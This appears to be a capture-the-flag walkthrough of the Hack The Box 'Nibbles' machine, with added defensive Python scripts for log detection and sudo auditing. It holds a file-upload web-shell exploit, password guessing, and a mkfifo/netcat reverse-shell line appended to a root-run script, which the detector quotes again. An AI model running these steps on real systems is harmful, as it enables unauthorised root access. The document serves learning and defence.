Wednesday, March 18, 2026

HTB - Nibbles

Enumeration

#1. Enumeration Framework

#2. Scanning Result

NMAP Scanning Result


Finding: open services on ports 22 and 80; OS is Linux

Whatweb Result

Curl Result
Finding : /nibbleblog/ directory

#3. Directory listing
Check using CURL
Finding : Service available

Check using Gobuster:
gobuster dir -u <url> -w /usr/share/dirb/wordlists/common.txt


Finding:
/.hta                 (Status: 403) [Size: 304]
/.htaccess            (Status: 403) [Size: 309]
/.htpasswd            (Status: 403) [Size: 309]
/admin                (Status: 301) [Size: 327] [--> http://10.129.200.170/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
/content              (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/content/]
/index.php            (Status: 200) [Size: 2987]
/languages            (Status: 301) [Size: 331] [--> http://10.129.200.170/nibbleblog/languages/]
/plugins              (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/plugins/]
/README               (Status: 200) [Size: 4628]
/themes               (Status: 301) [Size: 328] [--> http://10.129.200.170/nibbleblog/themes/]

Next to check
- /admin
- /admin.php
- /content
- /languages
- /plugins
- /README
- /themes
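The gobuster lines above are a fixed text format, so the triage that produced the "Next to check" list can be scripted. The parser below is an added example (not part of the original write-up); it takes the output exactly as printed above and groups it into reachable files, directories (redirects to a trailing-slash URL) and paths the server already denies.

```python
import re
from collections import defaultdict

# Gobuster "dir" output as shown in the write-up, embedded here as sample input.
GOBUSTER_OUTPUT = """\
/.hta                 (Status: 403) [Size: 304]
/.htaccess            (Status: 403) [Size: 309]
/.htpasswd            (Status: 403) [Size: 309]
/admin                (Status: 301) [Size: 327] [--> http://10.129.200.170/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
/content              (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/content/]
/index.php            (Status: 200) [Size: 2987]
/languages            (Status: 301) [Size: 331] [--> http://10.129.200.170/nibbleblog/languages/]
/plugins              (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/plugins/]
/README               (Status: 200) [Size: 4628]
/themes               (Status: 301) [Size: 328] [--> http://10.129.200.170/nibbleblog/themes/]
"""

# One result line: path, status, size and an optional redirect target.
LINE_RE = re.compile(
    r"^(?P<path>\S+)\s+\(Status:\s*(?P<status>\d{3})\)\s*\[Size:\s*(?P<size>\d+)\]"
    r"(?:\s*\[-->\s*(?P<redirect>[^\]]+)\])?\s*$"
)


def parse_gobuster(text):
    """Parse gobuster dir output into dicts; lines that do not match are skipped."""
    results = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        results.append({
            "path": m["path"],
            "status": int(m["status"]),
            "size": int(m["size"]),
            "redirect": m["redirect"],
        })
    return results


def triage(results):
    """Group findings the way a reviewer reads them."""
    groups = defaultdict(list)
    for r in results:
        if r["status"] == 200:
            groups["reachable"].append(r["path"])
        elif r["status"] in (301, 302) and r["redirect"] and r["redirect"].endswith("/"):
            groups["directories"].append(r["path"])
        elif r["status"] == 403:
            groups["forbidden"].append(r["path"])
        else:
            groups["other"].append(r["path"])
    return dict(groups)


def next_to_check(results):
    """Everything that answered 200 or is a directory, sorted case-insensitively."""
    t = triage(results)
    return sorted(t.get("reachable", []) + t.get("directories", []), key=str.lower)


if __name__ == "__main__":
    parsed = parse_gobuster(GOBUSTER_OUTPUT)
    for group, paths in triage(parsed).items():
        print(f"{group}: {', '.join(paths)}")
    print("next to check:", next_to_check(parsed))
```

The 403 entries for the .ht* files are the expected Apache default and need no follow-up; the 200 on /README is the one that matters for a site owner, since it is what discloses the exact Nibbleblog version later in this write-up.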

# Digital Footprint

1. Footprint /admin/


2. Footprint /admin.php

Finding : Login page

3. Footprint content

4. Footprint languages


5. Footprint Plugins

6. Footprint README
Finding: framework Nibbleblog v4.0.3 (Coffee)

7. Footprint http://10.129.200.170/nibbleblog/content/private/config.xml

<config>
<name type="string">Nibbles</name>
<slogan type="string">Yum yum</slogan>
<footer type="string">Powered by Nibbleblog</footer>
<advanced_post_options type="integer">0</advanced_post_options>
<url type="string">http://10.10.10.134/nibbleblog/</url>
<path type="string">/nibbleblog/</path>
<items_rss type="integer">4</items_rss>
<items_page type="integer">6</items_page>
<language type="string">en_US</language>
<timezone type="string">UTC</timezone>
<timestamp_format type="string">%d %B, %Y</timestamp_format>
<locale type="string">en_US</locale>
<img_resize type="integer">1</img_resize>
<img_resize_width type="integer">1000</img_resize_width>
<img_resize_height type="integer">600</img_resize_height>
<img_resize_quality type="integer">100</img_resize_quality>
<img_resize_option type="string">auto</img_resize_option>
<img_thumbnail type="integer">1</img_thumbnail>
<img_thumbnail_width type="integer">190</img_thumbnail_width>
<img_thumbnail_height type="integer">190</img_thumbnail_height>
<img_thumbnail_quality type="integer">100</img_thumbnail_quality>
<img_thumbnail_option type="string">landscape</img_thumbnail_option>
<theme type="string">simpler</theme>
<notification_comments type="integer">1</notification_comments>
<notification_session_fail type="integer">0</notification_session_fail>
<notification_session_start type="integer">0</notification_session_start>
<notification_email_to type="string">admin@nibbles.com</notification_email_to>
<notification_email_from type="string">noreply@10.10.10.134</notification_email_from>
<seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
<seo_site_description type="string"/>
<seo_keywords type="string"/>
<seo_robots type="string"/>
<seo_google_code type="string"/>
<seo_bing_code type="string"/>
<seo_author type="string"/>
<friendly_urls type="integer">0</friendly_urls>
<default_homepage type="integer">0</default_homepage>
</config>

8. Footprint http://10.129.200.170/nibbleblog/content/private/users.xml

Finding: username admin. The file also holds a blacklist section (failed-login counters per source IP), so brute-forcing admin.php gets the client IP blocked after repeated failures.
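From the site owner's side, the real finding in steps 7 and 8 is that content/private/ is served over the web at all: users.xml gives away the account list and, through the blacklist counters, a record of who has been guessing passwords. The script below is an added example (not from the write-up or from Nibbleblog) that parses a constructed users.xml in the same layout and reports the accounts plus any source IP whose failure count has reached a chosen threshold. The element layout of the blacklist section is an assumption based on Nibbleblog 4.x; the IPs and timestamps are made up.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on Nibbleblog's content/private/users.xml.
# The blacklist layout (an <ip> attribute with <date>/<fail_count> children)
# is assumed; the addresses and dates are invented for this example.
USERS_XML = """\
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">2</session_fail_count>
    <session_date type="integer">1514544131</session_date>
  </user>
  <blacklist type="string" ip="10.10.14.5">
    <date type="integer">1514544131</date>
    <fail_count type="integer">5</fail_count>
  </blacklist>
  <blacklist type="string" ip="10.10.14.9">
    <date type="integer">1514544200</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
</users>
"""

# Failure count at which a source IP is worth investigating (chosen for
# this report, not Nibbleblog's own lockout value).
FAIL_THRESHOLD = 5


def parse_users(xml_text):
    """Return the account names and the per-IP failed-login records."""
    root = ET.fromstring(xml_text)
    users = [u.get("username") for u in root.findall("user")]
    blacklist = []
    for b in root.findall("blacklist"):
        blacklist.append({
            "ip": b.get("ip"),
            "fail_count": int(b.findtext("fail_count") or 0),
            "date": int(b.findtext("date") or 0),
        })
    return {"users": users, "blacklist": blacklist}


def brute_force_sources(parsed, threshold=FAIL_THRESHOLD):
    """Source IPs at or above the threshold, sorted by failure count (highest first)."""
    hits = [b for b in parsed["blacklist"] if b["fail_count"] >= threshold]
    return [b["ip"] for b in sorted(hits, key=lambda b: b["fail_count"], reverse=True)]


if __name__ == "__main__":
    parsed = parse_users(USERS_XML)
    print("accounts exposed:", parsed["users"])
    print("sources at/over threshold:", brute_force_sources(parsed))
```

Anything this script can read from a plain HTTP fetch, an attacker can read too, so the fix is at the web server: the content/private/ directory should be denied to clients, and the account name discovered here is what turns the password-guessing step below into a single-username attack.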


# Exploit Information

Finding:
  1. Activate the My image plugin by visiting http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
  2. Upload a PHP shell, ignoring the warnings
  3. Visit http://localhost/nibbleblog/content/private/plugins/my_image/image.php. This is the default name of images uploaded via the plugin.

# Password Credential

Finding: candidate passwords: nibble, nibbles, nibbler, nibbles1, nibbles2, nibbles3

Gaining Access

#1. Login page
admin : nibbles
#2. Upload webshell
Search GitHub for a PHP reverse shell



# Modify code



Finding: listener port 1234

# Netcat
Start a Netcat listener on port 1234
Access the webshell at http://<ip>/nibbleblog/content/private/plugins/my_image/image.php

Netcat receives the shell
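The access sequence above leaves a clear trail in the web server log: a request to admin.php that installs the plugin, followed shortly by a request for a .php file under content/private/, a directory that should only ever hold data. The detector below is an added example (not part of the write-up) that reads Apache combined-log lines, records plugin installs per client IP and raises a high-severity alert when the same IP then requests PHP under content/ within a time window; a PHP request under content/ with no preceding install is still flagged at medium severity. The log lines are constructed; the install URL and image.php path are the ones quoted in the write-up, while the POST to action=config is an assumption about where the plugin's upload form submits.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache combined-log lines (not taken from the box).
SAMPLE_LOG = """\
10.10.14.5 - - [18/Mar/2026:10:01:02 +0000] "GET /nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image HTTP/1.1" 200 1401 "-" "Mozilla/5.0"
10.10.14.5 - - [18/Mar/2026:10:01:40 +0000] "POST /nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
10.10.14.5 - - [18/Mar/2026:10:02:05 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.7 - - [18/Mar/2026:10:03:00 +0000] "GET /nibbleblog/index.php HTTP/1.1" 200 2987 "-" "Mozilla/5.0"
10.10.14.9 - - [18/Mar/2026:11:30:00 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 404 294 "-" "curl/8.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, URL, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Plugin install through the admin controller (the first step of the sequence).
PLUGIN_INSTALL = re.compile(r"/admin\.php\?.*controller=plugins.*action=install", re.I)
# Any PHP file requested under the data directory, which should never execute code.
CONTENT_PHP = re.compile(r"/nibbleblog/content/.*\.php(\?|$)", re.I)


def parse_line(line):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "url": m["url"],
        "status": int(m["status"]),
    }


def detect(lines, window=timedelta(minutes=10)):
    """Yield (severity, ip, url) alerts for PHP requests under content/."""
    alerts = []
    installs = {}  # client IP -> time of its most recent plugin install
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if PLUGIN_INSTALL.search(ev["url"]):
            installs[ev["ip"]] = ev["ts"]
        if CONTENT_PHP.search(ev["url"]):
            severity = "medium"
            t0 = installs.get(ev["ip"])
            if t0 is not None and timedelta(0) <= ev["ts"] - t0 <= window:
                severity = "high"  # install followed by code under content/ from the same IP
            alerts.append((severity, ev["ip"], ev["url"]))
    return alerts


if __name__ == "__main__":
    for severity, ip, url in detect(SAMPLE_LOG.splitlines()):
        print(f"[{severity}] {ip} requested {url}")
```

The second alert (a 404 from a different client) shows why the medium rule is worth keeping: scanners probe the known image.php path even when nothing has been uploaded, and a server that refuses to execute PHP under content/ turns the high-severity case into a harmless download as well.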

Privilege Escalation

Check for privilege escalation paths

# Running sudo -l


# (Additional) Running automated privilege escalation checks
Check the scripts available online
Read the LinPEAS manual


Download script from:
https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh


Start a web server to transfer the script from Kali Linux to the target

Use the Python HTTP server (serve from /tmp for safety)
python3 -m http.server 8080

On the target, download linpeas.sh from that server
# Running linpeas.sh
chmod +x linpeas.sh
./linpeas.sh -a > linpeas.txt


# Analyze the output to understand the current access level and the sudo rules


Performing Privilege Escalation
# Access the path
Finding: inject into /home/nibbler/personal/stuff/monitor.sh (the script the sudo rule allows)

Reverse shell script
# Research:
https://github.com/blue0x1/awesome-curl-reverseshell-oneliners
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Google "Mkfifo and Netcat One-liner Reverse Shell"


# Reverse shell script
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *kali-vpn-ip* 4444 >/tmp/f" >> monitor.sh

# Must be run with sudo (so the shell comes back as root)

# Accessing shell
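The root cause of this escalation is a sudo rule whose target script is writable by the very user allowed to run it, and the symptom is the appended mkfifo/nc line. The audit below is an added example (not from the write-up or from any tool it mentions): it parses the rule lines of `sudo -l` output, checks with plain stat arithmetic whether the target file or its parent directory is writable by the invoking user, and scans the script body for the reverse-shell indicators used in this write-up. The `sudo -l` text is a constructed sample shaped like the rule found on the box, and `demo()` builds a throwaway copy of monitor.sh in a temporary directory so the check runs offline.

```python
import os
import re
import stat
import tempfile

# Constructed sample of the rule lines `sudo -l` prints; the path is the one
# found on the box, the hostname is assumed.
SUDO_L_OUTPUT = """\
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# "(runas) TAG: /path" as printed by sudo -l.
SUDO_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)")

# Indicators of the one-liner appended in this write-up.
SUSPICIOUS = [re.compile(p) for p in (r"\bmkfifo\b", r"\bnc\b.*\d{2,5}", r"/bin/sh\s+-i", r"\bbash\s+-i\b")]

# The appended line from the write-up, reproduced only as scan input.
APPENDED_LINE = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *kali-vpn-ip* 4444 >/tmp/f"


def parse_sudo_l(text):
    """Extract (runas, NOPASSWD flag, command path) from each rule line."""
    rules = []
    for line in text.splitlines():
        m = SUDO_RULE_RE.match(line)
        if m:
            rules.append({"runas": m["runas"], "nopasswd": "NOPASSWD" in m["tags"], "cmd": m["cmd"]})
    return rules


def writable_by(path, uid, gids):
    """Pure stat check so the question can be asked for any user, not just the caller."""
    st = os.stat(path)
    if uid == 0:
        return True
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def audit_rule(rule, uid, gids):
    """Findings for one sudo rule from the point of view of user uid."""
    path = rule["cmd"]
    if not os.path.exists(path):
        return ["target does not exist"]
    findings = []
    if writable_by(path, uid, gids):
        findings.append("target writable by the sudo-invoking user")
    if writable_by(os.path.dirname(path), uid, gids):
        findings.append("parent directory writable (file can be replaced)")
    try:
        with open(path, errors="replace") as f:
            content = f.read()
    except OSError:
        return findings
    for pat in SUSPICIOUS:
        if pat.search(content):
            findings.append(f"suspicious content matches {pat.pattern!r}")
    return findings


def demo():
    """Audit a throwaway monitor.sh as its owner and as an unrelated user."""
    with tempfile.TemporaryDirectory() as d:  # created mode 0700
        path = os.path.join(d, "monitor.sh")
        with open(path, "w") as f:
            f.write("#!/bin/bash\necho monitoring\n" + APPENDED_LINE + "\n")
        os.chmod(path, 0o755)  # owner-writable, like a user's own script
        rule = {"runas": "root", "nopasswd": True, "cmd": path}
        other_uid = 99999  # arbitrary uid that does not own the temp files
        return {
            "owner": audit_rule(rule, os.getuid(), set(os.getgroups())),
            "other_user": audit_rule(rule, other_uid, {other_uid}),
        }


if __name__ == "__main__":
    print(parse_sudo_l(SUDO_L_OUTPUT))
    for who, findings in demo().items():
        print(who, findings)
```

The "owner" result is the Nibbles situation: a script that root will execute on request, living in a directory and with a mode the requesting user controls. The mitigation is to make sudo targets root-owned and non-writable (directory included), and the content scan is the quick check an incident responder runs once the rule is known.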